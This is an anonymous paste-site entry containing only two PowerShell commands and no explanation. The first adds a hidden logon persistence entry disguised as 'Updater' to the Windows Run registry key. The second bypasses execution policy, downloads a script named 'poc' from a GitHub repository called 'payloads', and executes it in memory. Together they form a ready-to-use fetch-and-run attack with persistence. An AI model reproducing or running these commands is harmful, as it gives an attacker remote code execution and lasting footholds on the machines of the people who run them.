Guest

Untitled 1857

May 9th, 2026
12
0
Never
Not a member of GistPad yet? Sign Up, it unlocks many cool features!
None 0.89 KB | None | 0 0
  1. New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "IEX(IWR https://raw.githubusercontent.com/lubrj/payloads/refs/heads/main/poc -UseBasicParsing)"' -PropertyType String -Force
  2. powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "IEX(IWR https://raw.githubusercontent.com/lubrj/payloads/refs/heads/main/poc -UseBasicParsing)"
RAW Paste Data Copied